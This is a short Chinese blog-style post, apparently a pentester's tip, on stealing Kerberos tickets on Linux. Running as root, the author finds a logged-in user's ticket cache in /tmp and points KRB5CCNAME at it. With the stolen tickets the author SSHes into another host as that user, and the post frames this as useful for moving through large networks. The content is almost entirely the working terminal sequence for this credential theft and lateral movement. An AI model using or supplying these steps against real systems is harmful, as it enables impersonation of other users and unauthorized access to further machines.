获得使用kerberos的服务器中的某一台的root或者已登录用户的shell,操作如下:
[root@test3.xxoxx.com ~]# whoami root [root@test3.xxoxx.com ~]# klist -f klist: No credentials cache found (ticket cache FILE:/tmp/krb5cc_0) Kerberos 4 ticket cache: /tmp/tkt0 klist: You have no tickets cached 看谁在线上,就用它的session [root@test3.xxoxx.com ~]# w 17:39:30 up 11 days, 22:34, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT xiaoyu pts/1 test4.xxoxx.com 16:47 40.00s 0.00s 0.00s -bash root pts/2 test6.xxoxx.com 17:32 0.00s 0.00s 0.00s w [root@test3.xxoxx.com ~]# ls /tmp krb5cc_1025_p11225 krb5cc_1025_Z11358 [root@test3.xxoxx.com ~]# export KRB5CCNAME=FILE:/tmp/krb5cc_1025_Z11358 [root@test3.xxoxx.com ~]# klist -f Ticket cache: FILE:/tmp/krb5cc_1025_Z11358 Default principal: xiaoyu@xxoxx.COM Valid starting Expires Service principal 05/11/09 16:47:09 05/12/09 16:47:09 krbtgt/xxoxx.COM@xxoxx.COM Flags: FIA 05/11/09 16:52:19 05/12/09 16:47:09 host/test0.xxoxx.com@xxoxx.COM Flags: FAT 05/11/09 16:55:45 05/12/09 16:47:09 host/test2.xxoxx.com@xxoxx.COM Flags: FAT Kerberos 4 ticket cache: /tmp/tkt0 klist: You have no tickets cached 当然test2.xxoxx.com kerberos登录方式得是开启的 [root@test3.xxoxx.com ~]# ssh xiaoyu@test2.xxoxx.com -bash-3.00$ |
该写环境变量KRB5CCNAME的指向,就能用登录用户的票据去登录其他机器了,在XX大型网络的时候有点用处。不得不说,我在起机器名的时候真是没创意,老是xxoxx,唉~~